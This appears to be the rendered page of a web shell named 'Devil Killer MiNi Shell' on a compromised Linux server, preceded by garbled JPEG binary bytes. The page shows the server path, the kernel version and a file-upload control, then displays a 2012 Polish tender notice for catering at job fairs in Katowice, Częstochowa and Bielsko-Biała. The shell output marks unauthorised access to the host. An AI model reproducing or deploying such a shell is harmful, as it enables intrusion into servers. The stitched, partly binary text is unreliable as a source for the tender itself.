JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120831/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120831/187673-N-2012.html

<p class="kh_header"><b>Katowice: ŚWIADCZENIE USŁUGI CATERINGOWEJ ORAZ RESTAURACYJNEJ</b><br>
<b>Numer ogłoszenia: 187673 - 2012; data zamieszczenia: 31.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUGI CATERINGOWEJ ORAZ RESTAURACYJNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I 

Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców ( 200 osób) podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w KATOWICACH w dniu 11.10.2012 r. 
Na usługę składać się będą:
1. Napoje: 
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń.
- woda mineralna niegazowana (80 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (80 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (100 porcji x 200 ml), jabłkowy (100 porcji x 200 ml), z czarnej porzeczki (100 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 400 sztuk):
- z szynką i pomidorkiem (80 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (80 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (80 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (80 szt. x 40 g); 
- z ementalerem, ogórkiem konserwowym i papryką konserwową (80 szt. x 40 g);
3. Świeże owoce podawane na paterach:
- jabłka - 2 kg
- banany - 1,5 kg
- winogrona (zielone, czarne) - łącznie 3 kg
- mandarynki - 2 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem  brzoskwinią (150 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (150 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę z każdego rodzaju.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (50 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (50 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (50 szt.)
- roladki naleśnikowe z nadzieniem z łososia i szpinakiem (50 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 100 szt.)
6. Sałatki - 2 rodzaje:
- sałatka nicejska z tuńczykiem (120 porcji x 100 g)
- sałatka Cezar z kurczakiem grillowanym, parmezanem i grzankami (120 porcji x 100 g),
7. Ciepły posiłek podany w podgrzewaczach:
- bogracz lub strogonow lub gulasz (120 porcji x 200 ml),
- pierogi mieszane - ruskie, z mięsem, z kapustą i grzybami, ze szpinakiem (razem 120 porcji x 200 g)    
- pieczywo mieszane - białe, ciemne (120 porcji x 50 g). 

8. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
9. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
10. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 16:00).
11. Transport. 
Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów - budynku Śląskiego Urzędu Wojewódzkiego mieszczącego się przy ul. Jagiellońskiej 25 w Katowicach (Sala Beskidzka).
Napoje (poz. 1), kanapki bankietowe (poz. 2), świeże owoce (poz. 3), wyroby cukiernicze (poz. 4) powinny zostać dostarczone do godz. 9:00.
Przekąski koktajlowe (poz. 5), sałatki (poz. 6) i ciepły posiłek podawany w podgrzewaczach (poz. 7) powinny zostać dostarczone na godz. 13:30. 
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 100 butelek (500 ml) wody mineralnej gazowanej,
- 150 butelek (500 ml) wody mineralnej niegazowanej,
- 200 kubeczków jednorazowych,
- słone paluszki (80 opakowań po min. 70g).

Produkty do rozłożenia na stoiskach targowych należy dostarczyć do godz. 8:00. 
 


CZĘŚĆ II 

Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców ( 80 osób) podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w CZĘSTOCHOWIE w dniu 11.10.2012 r. 
Na usługę składać się będą:
1. Napoje: 
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń.
- woda mineralna niegazowana (50 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (40 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (40 porcji x 200 ml), jabłkowy (40 porcji x 200 ml), z czarnej porzeczki (40 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 200 sztuk):
- z szynką i pomidorkiem (40 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (40 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (40 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (40 szt. x 40 g); 
- z ementalerem, ogórkiem konserwowym i papryką konserwową (40 szt. x 40 g).
3. Świeże owoce podawane na paterach:
- jabłka - 1 kg
- banany - 1 kg
- winogrona (zielone, czarne) - łącznie 1,5 kg
- mandarynki - 1 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem  brzoskwinią (60 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (60 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę z każdego rodzaju.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (40 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (40 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (40 szt.)
- roladki naleśnikowe z nadzieniem z łososia i szpinakiem (40 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 80 szt.)
6. Sałatki - 2 rodzaje:
- sałatka nicejska z tuńczykiem (60 porcji x 100 g)
- sałatka Cezar z kurczakiem grillowanym, parmezanem i grzankami (60 porcji x 100 g),
7. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
8. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
9. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 16:00).
10. Transport. 

Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów - budynku Częstochowskiego Parku Przemysłowo - Technologicznego mieszczącego się przy ul. Wały Dwernickiego 117 121.
Napoje (poz. 1), kanapki bankietowe (poz. 2), świeże owoce (poz. 3), wyroby cukiernicze (poz. 4) powinny zostać dostarczone do godz. 9:00.
Przekąski koktajlowe (poz. 5) i sałatki (poz. 6) powinny zostać dostarczone na godz. 13:30. 
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 40 butelek (500 ml) wody mineralnej gazowanej,
- 40 butelek (500 ml) wody mineralnej niegazowanej,
- 80 kubeczków jednorazowych,
- słone paluszki (40 opakowań po min. 70g).
Produkty do rozłożenia na stoiskach targowych należy dostarczyć do godz. 8:00. 

CZĘŚĆ III 

Przedmiotem zamówienia jest świadczenie usługi cateringowej dla gości i wystawców (80 osób) podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w BIELSKU - BIAŁEJ w dniu 11.10.2012 r. 

Na usługę składać się będą:
1. Napoje: 
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń.
- woda mineralna niegazowana (50 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (40 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (40 porcji x 200 ml), jabłkowy (40 porcji x 200 ml), z czarnej porzeczki (40 porcji x 200 ml), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 200 sztuk):
- z szynką i pomidorkiem (40 szt. x 40 g),
- z rostbefem pieczonym i sosem tatarskim (40 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (40 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (40 szt. x 40 g); 
- z ementalerem, ogórkiem konserwowym i papryką konserwową (40 szt. x 40 g).
3. Świeże owoce podawane na paterach:
- jabłka - 1 kg
- banany - 1 kg
- winogrona (zielone, czarne) - łącznie 1,5 kg
- mandarynki - 1 kg.
4. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem brzoskwinią (60 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (60 porcji x 65 g),  
- mieszanka kruchych ciasteczek (co najmniej 3 rodzaje) w ilości nie mniejszej niż 30 g na osobę z każdego rodzaju.
5. Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (40 szt.)
- babeczki z musem śmietankowym ze świeżymi ziołami (40 szt.)
- mini szaszłyki z grillowanym kurczakiem i ananasem (40 szt.)
- roladki naleśnikowe z nadzieniem z łososia i szpinakiem (40 szt.)
- koreczki bankietowe - min. 3 rodzaje (łącznie 80 szt.)

6. Sałatki - 2 rodzaje:
- sałatka nicejska z tuńczykiem (60 porcji x 100 g)
- sałatka Cezar z kurczakiem grillowanym, parmezanem i grzankami (60 porcji x 100 g),

7. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
8. Zabezpieczenie i dekoracja stołów (podkłady zabezpieczające i wyciszające pod obrusy, obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
9. Obsługa kelnerska przez cały czas trwania wydarzenia (w godz. 9:00 - 16:00).
10. Transport. 
Catering powinien zostać dostarczony przez Wykonawcę do miejsca odbywania Targów -budynku Bielskiego Centrum Kształcenia Ustawicznego i Praktycznego mieszczącego się przy ul. Piastowskiej 21.
Napoje (poz. 1), kanapki bankietowe (poz. 2), świeże owoce (poz. 3), wyroby cukiernicze (poz. 4) powinny zostać dostarczone do godz. 9:00.
Przekąski koktajlowe (poz. 5) i sałatki (poz. 6) powinny zostać dostarczone na godz. 13:30.
Ponadto Wykonawca powinien dostarczyć produkty do rozłożenia na stoiskach targowych: 
- 40 butelek (500 ml) wody mineralnej gazowanej,
- 40 butelek (500 ml) wody mineralnej niegazowanej,
- 80 kubeczków jednorazowych,
- słone paluszki (40 opakowań po min. 70g).
Produkty do rozłożenia na stoiskach targowych należy dostarczyć do godz. 8:00. 

CZĘŚĆ IV

Przedmiotem zamówienia jest świadczenie usługi restauracyjnej  (kolacja) w formie bufetu szwedzkiego wydana w lokalu, który zapewni Wykonawca, w dniu 10.10.2012 r. od godz. 18:00. dla 20 gości zagranicznych i wystawców biorących udział w Europejskich Targach Przedsiębiorczości, Pracy i Edukacji w Katowicach oraz przedstawicieli organizatora. 
Restauracja , w której świadczona będzie usługa powinna:
- być zlokalizowana w sąsiedztwie siedziby Zamawiającego i miejsca odbywania Targów, rozumianym jako obszar ograniczony następującymi ulicami: 
-od północy, ulicą Andrzeja od skrzyżowania z ulica Mikołowską, następnie ulicą T. Kościuszki przechodzącą w ulicę M. Konopnickiej i ulicą Wojewódzką do skrzyżowania z ulicą J. Lompy, 
-od wschodu, ulicą J. Lompy od skrzyżowania z ulicą Wojewódzką do wjazdu na Aleję Górnośląską,  
-od południa, Aleją Górnośląską od wjazdu od strony ulicy Lompy do skrzyżowania z ulicą Mikołowską, 
-od zachodu, ulicą Mikołowską od skrzyżowania z Aleją Górnośląską do skrzyżowania z ulicą Andrzeja, 
- dysponować wyodrębnioną salą zdolną pomieścić ok. 20 gości (przy stołach ustawionych w kształcie litery U lub w kształcie prostokąta), która będzie udostępniona do wyłącznej dyspozycji Zamawiającego od godz. 18:00 do ok. godz. 23:00. 
Na usługę składać się będą:
- 3 rodzaje przystawek (pieczarki faszerowane z szynką lub ziołami, carpaccio z polędwicy wołowej lub łososia, paluszki serowe panierowane z sosem musztardowo-miodowym), 
- 3 rodzaje zup (cebulowa z grzankami i serem, krem z borowików, żurek z białą kiełbasą i jajkiem), 
- 3 dania główne (kieszonka z kurczaka nadziewana serem, makaron penne ze szpinakiem 
i suszonymi pomidorami, dorsz w koszulce z masłem koperkowym)
- dodatki: grillowane warzywa (bakłażan, cukinia, marchew, cebula, papryka), zestaw surówek, ryż, zapiekane ziemniaki, 
- deser: ciasto domowe z owocami, świeże owoce, 
- napoje: woda mineralna, soki (jabłkowy, z czarnej porzeczki), kawa, herbata, 1 lampka wina
- zimna płyta: wędliny, drobne przekąski typu tymbaliki, koreczki, kanapki bankietowe, 2 rodzaje sałatek, świeże i marynowane warzywa, pieczywo, masło.
- obsługa kelnerska przez cały czas trwania kolacji, przy czym przynajmniej jedna osoba z obsługi kelnerskiej powinno posługiwać się językiem angielskim w stopniu minimum komunikatywnym.     
Ponadto Wykonawca powinien zapewnić odpowiedni wystrój sali (dekoracje stołów, obrusy materiałowe, dopasowane serwetki papierowe). 
Wykonawca zobowiązany jest podać w ofercie nazwę oraz adres restauracji, w której świadczona będzie usługa restauracyjna.
Ostateczna liczba uczestników zostanie przekazana Wykonawcy na 2 dni robocze przed wykonaniem usługi, przy czym z usługi restauracyjnej korzystać będzie nie mniej niż 15 osób. 

CZĘŚĆ V 

Przedmiotem zamówienia jest świadczenie usługi cateringowej dla uczestników  szkolenia dla pracowników powiatowych urzędów pracy z województwa śląskiego z zakresu koordynacji systemów zabezpieczenia społecznego (40 osób) w KATOWICACH w dniu 18.10.2012 r.
Na usługę składać się będą:
1. Napoje: 
- gorąca wysokogatunkowa kawa i herbata podana w termosach - bez ograniczeń,
- dodatki: cukier, mleko, cytryna - bez ograniczeń.
- woda mineralna niegazowana (25 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy i jabłkowy lub z czarnej porzeczki (po 2 litry z każdego rodzaju), podawane w szklanych dzbankach. 
2. Kanapki bankietowe na białym i ciemnym pieczywie (łącznie 120 sztuk):
- z szynką i pomidorkiem (30 szt. x 40 g),
- z pastą jajeczną, pomidorem, papryką i pietruszką (30 szt. x 40 g),
- z pastą z tuńczyka, ogórkiem konserwowym, oliwką i natką (30 szt. x 40 g); 
- z rostbefem pieczonym i sosem tatarskim (30 szt. x 40 g).
3. Wyroby cukiernicze:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (30 porcji x 65 g),
- babeczki wypełnione kremem waniliowym lub budyniem, przybrane owocami (30 porcji x 65 g),  
4. Przekąski słone:
- mix przekąsek: paluszki, krakersy, precelki - 50g różnych przekąsek  osoba

5. Zastawa biała porcelanowa lub ceramiczna, sztućce trwałe - w odpowiedniej ilości (nie dopuszcza się stosowania plastikowych lub papierowych kubeczków, sztućców itp).
6. Dekoracja stołów (obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe).
7. Transport. 

Catering powinien być dostarczony do siedziby Zamawiającego do godz. 9:00 (II piętro, sala nr 221)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE PRZEWIDUJE  WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DOTYCZY CZĘŚCI I, II, III
Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, 
iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie 2 usługi, których przedmiotem zamówienia było świadczenie usługi cateringowej. 

	Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia,nie spełnia na podstawie załączonego do oferty wykazu zawierającego usługi wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert bądź wykonywaną nadal, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające w/w przedmiotowi zamówienia, z podaniem nazwy jednostki, dla której była lub jest świadczona, datą jej realizacji oraz załączeniem dokumentu lub dokumentów potwierdzających, że usługa wymieniona w wykazie została wykonana lub jest wykonywana należycie (np. referencje). 

Dokument lub dokumenty potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

Nie wykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
